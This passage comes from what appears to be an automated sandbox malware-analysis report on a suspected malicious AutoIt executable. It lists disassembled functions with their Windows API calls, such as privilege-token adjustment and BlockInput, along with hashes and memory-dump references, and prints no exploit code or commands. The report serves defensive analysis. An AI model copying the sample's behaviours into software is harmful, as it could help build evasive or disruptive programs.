                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: 984e7fa08a5e2612314494ef62da5a7550373055b2ecebcfadae2974db0c2240
                                        • Instruction ID: f253a06c64b10a33b7abebd3c28e3629b39f36c49eedfdbc990e91500bc6c8ae
                                        • Opcode Fuzzy Hash: 984e7fa08a5e2612314494ef62da5a7550373055b2ecebcfadae2974db0c2240
                                        • Instruction Fuzzy Hash: BBE01A32014601AEE7252B21FC05EB37BA9FB04310B10892EB5A5808B1DAA26CE0DB50
                                        Function 000A676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000A6766,?,?,00000008,?,?,000AFEFE,00000000), ref: 000A6998
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: b1c63c941c9d5fe820fe1b8648651487481741389c5e52a98539f524cc1466cb
                                        • Instruction ID: 1e9d5cd0a70b49720b8491f3ce4942de174ca58469cf1e2bf0fcae71170e7bcc
                                        • Opcode Fuzzy Hash: b1c63c941c9d5fe820fe1b8648651487481741389c5e52a98539f524cc1466cb
                                        • Instruction Fuzzy Hash: 30B13D31610608DFD755CF68C48AB697BF0FF46364F298658E89ACF2A2C736D991CB40
                                        Function 0008B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 14f703a0d1376c5989b161b1c47bfa681bccaa93987ad99cb9bf95a97c11f97d
                                        • Instruction ID: c254b0aee58229048da1b402e33420af12788e7b008d06909c9a736dd62e1c44
                                        • Opcode Fuzzy Hash: 14f703a0d1376c5989b161b1c47bfa681bccaa93987ad99cb9bf95a97c11f97d
                                        • Instruction Fuzzy Hash: 25125F719002299BDB64DF58C881BEEB7F5FF48710F1481AAE849EB251DB709E81CB94
                                        Function 000EEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 000EEABD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: 0ab83952e47d4fe5ce6df4b8a59e37cc6662de0daf3470d69d55741022f80b74
                                        • Instruction ID: 5c5af7bc6e8873986b2bf1eb5e99e9e08b8a1c1d5e5c9a760a0dd31edc990497
                                        • Opcode Fuzzy Hash: 0ab83952e47d4fe5ce6df4b8a59e37cc6662de0daf3470d69d55741022f80b74
                                        • Instruction Fuzzy Hash: 7BE04F312002049FD710EF6AD804E9AF7E9AF98760F04C42AFC49D7391DBB4F8408B91
                                        Function 000909D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000903EE), ref: 000909DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 8f0a6f784f97942b43784582b1d6fe5fd066248836564df092c660c22c055570
                                        • Instruction ID: c980d46b0653971412f51a32b3fb63a18e27590b6b0177063f219e7224d655c4
                                        • Opcode Fuzzy Hash: 8f0a6f784f97942b43784582b1d6fe5fd066248836564df092c660c22c055570
                                        • Instruction Fuzzy Hash:
                                        Function 0009781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                        • Instruction ID: 38797e97cbe3b5409aa3815a2bb343da2a5e654f334e17621c228c33a7fc6c15
                                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                        • Instruction Fuzzy Hash: 655155636BC6055ADFB88528885E7FF23C9DB42304F280509E88EDB292CE15DE02F356
                                        Function 000A6DD9 Relevance: .6, Instructions: 637COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6b624095efe4bcb400282fa4cf748b89b74a9d044cd904a9e020dd5b4d329938
                                        • Instruction ID: b1c134f8956a207e56876a2c8e0e16dd961045747b927b463f8edc960c716a8f
                                        • Opcode Fuzzy Hash: 6b624095efe4bcb400282fa4cf748b89b74a9d044cd904a9e020dd5b4d329938
                                        • Instruction Fuzzy Hash: 22321222D29F014DDB279634DD22336A689AFB73C5F15D737E81AB5EA6EB29C4C34100
                                        Function 0008CC39 Relevance: .6, Instructions: 635COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4a2035383c92253d1313187d4a9bb51fabf9fe4ada2a89b918824ef4e2614189
                                        • Instruction ID: 697fc979da455f762f84046bd0ae89c2fd4ba70325c135f9452167aabdee80f1
                                        • Opcode Fuzzy Hash: 4a2035383c92253d1313187d4a9bb51fabf9fe4ada2a89b918824ef4e2614189
                                        • Instruction Fuzzy Hash: D832EE32A041458BFF78DB28C494FBDBBE1EB45304F28856ED89E9B691D230DD81DB51
                                        Function 00077920 Relevance: .6, Instructions: 563COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e00d967fd922ff65fd840393897745b48de71f0dab8b9eb2286da84822d77c9
                                        • Instruction ID: 802983f7a3554a8ea7a6637e72ef10b65f87bdf6d9c423c45b617bd45877b813
                                        • Opcode Fuzzy Hash: 4e00d967fd922ff65fd840393897745b48de71f0dab8b9eb2286da84822d77c9
                                        • Instruction Fuzzy Hash: 01229E70E0060A9FDF14CF64C881BEEB3F5FF48341F148569E81AA7291EB3AA954CB54
                                        Function 000791C0 Relevance: .5, Instructions: 475COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 773360346f70fd0ccf366287177f6532d836d0d318b02c6750539d4e08476acf
                                        • Instruction ID: 3c68fc2988fd752fdc9b8abb66e7da8735c0166c4d9a53cb2063fc79394e48c3
                                        • Opcode Fuzzy Hash: 773360346f70fd0ccf366287177f6532d836d0d318b02c6750539d4e08476acf
                                        • Instruction Fuzzy Hash: 8202C8B0E00206EFDF14DF64D841AEEB7B5FF44300F118169E85A9B291EB35AE51CB95
                                        Function 00091C77 Relevance: .3, Instructions: 254COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction ID: 694a63dade0066b89d1952879eb0f7cbb0ab3662a43bd2723c497e578426910f
                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction Fuzzy Hash: 179146727090A34ADF6D463A85740BEFFE15F923A131A079DE4F2CA1C5EE24D954F620
                                        Function 000919B0 Relevance: .2, Instructions: 240COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction ID: a58054e344b473841416efdac37b73d5464cfae3d150d6840d3de0da533d2b8e
                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction Fuzzy Hash: 749114723090A34ADFAD467A85740BDFFE15B923A231A079DD4F2CA1C5FE24D954F620
                                        Function 00097A4A Relevance: .2, Instructions: 237COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0cfce7b9a270eda301d35c901ae258acc4a1e134889a665ff483664d4af79986
                                        • Instruction ID: e2aed95262f4a31aaeaf984653059465653dd59640585bc08ad7c7749e721bbc
                                        • Opcode Fuzzy Hash: 0cfce7b9a270eda301d35c901ae258acc4a1e134889a665ff483664d4af79986
                                        • Instruction Fuzzy Hash: E261897322C30956DEB899288CA5BFE23C9DF82700F14491EE94EDB292D7119E42F356
                                        Function 00097CA7 Relevance: .2, Instructions: 237COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e35cb4663c4237f45f6ff668a5bf9676b64470e1de4ec2ca47631a1264de539
                                        • Instruction ID: 9347b39de7720124cc5f3e459e21eddc03c4f8b441ec789aa4f6093cd90b6fe7
                                        • Opcode Fuzzy Hash: 3e35cb4663c4237f45f6ff668a5bf9676b64470e1de4ec2ca47631a1264de539
                                        • Instruction Fuzzy Hash: 8D61897333C70997DEB84A288851BFF23E8EF46704F104959E88FDB282DA129D42B355
                                        Function 00091706 Relevance: .2, Instructions: 232COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction ID: b7a1f876686d34415f0682e997a952b4598bcfea3502a30468e1d79fb2b29afb
                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction Fuzzy Hash: 9381627270D0A309DFAE427A85344BEFFE15F923A131A079ED4F2CA1C1EE249554F620
                                        Function 01393640 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                        • Instruction ID: 977197442ba659309f1160f0f347bc28cd0695bd65fc828fa0d7372c05f19ec9
                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                        • Instruction Fuzzy Hash: CF41D5B1D1051CDBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                        Function 000E2046 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f61e69edb1b8e20fa682f047c37a1066d25a5912eaee3995838f553889adf6f5
                                        • Instruction ID: f3c17f25d80af9693a0330d78127a62db9fd04f27a3117c63fccf021588c11de
                                        • Opcode Fuzzy Hash: f61e69edb1b8e20fa682f047c37a1066d25a5912eaee3995838f553889adf6f5
                                        • Instruction Fuzzy Hash: D621E7322206118BDB28CF79C82367E73E9A754320F558A2EE4A7D37D1DE35A944CB80
                                        Function 01393530 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                        • Instruction ID: 51e4b9455e7a4fbcca741ca06ecbae583418eff9dcb8a09b2036a5e0105e499e
                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                        • Instruction Fuzzy Hash: 140192B8A00109EFCB44DFA8C5909AEF7B5FF48314F208599D809A7701D730AE41DB80
                                        Function 013934D0 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                        • Instruction ID: fa16e9ee16038011a5e11661fa166bc182b0b12904173ae976cdfffc8ef37646
                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                        • Instruction Fuzzy Hash: CB019278A04109EFCB44DFA8C5909AEF7B5FB48314F208599DC09A7701D730EE41DB80
                                        Function 01391E70 Relevance: .0, Instructions: 6COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                        Function 000F2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 000F2B30
                                        • DeleteObject.GDI32(00000000), ref: 000F2B43
                                        • DestroyWindow.USER32 ref: 000F2B52
                                        • GetDesktopWindow.USER32 ref: 000F2B6D
                                        • GetWindowRect.USER32(00000000), ref: 000F2B74
                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 000F2CA3
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 000F2CB1
                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2CF8
                                        • GetClientRect.USER32(00000000,?), ref: 000F2D04
                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000F2D40
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2D62
                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2D75
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2D80
                                        • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2D89
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2D98
                                        • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2DA1
                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2DA8
                                        • GlobalFree.KERNEL32(00000000), ref: 000F2DB3
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2DC5
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0010FC38,00000000), ref: 000F2DDB
                                        • GlobalFree.KERNEL32(00000000), ref: 000F2DEB
                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 000F2E11
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 000F2E30
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F2E52
                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000F303F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
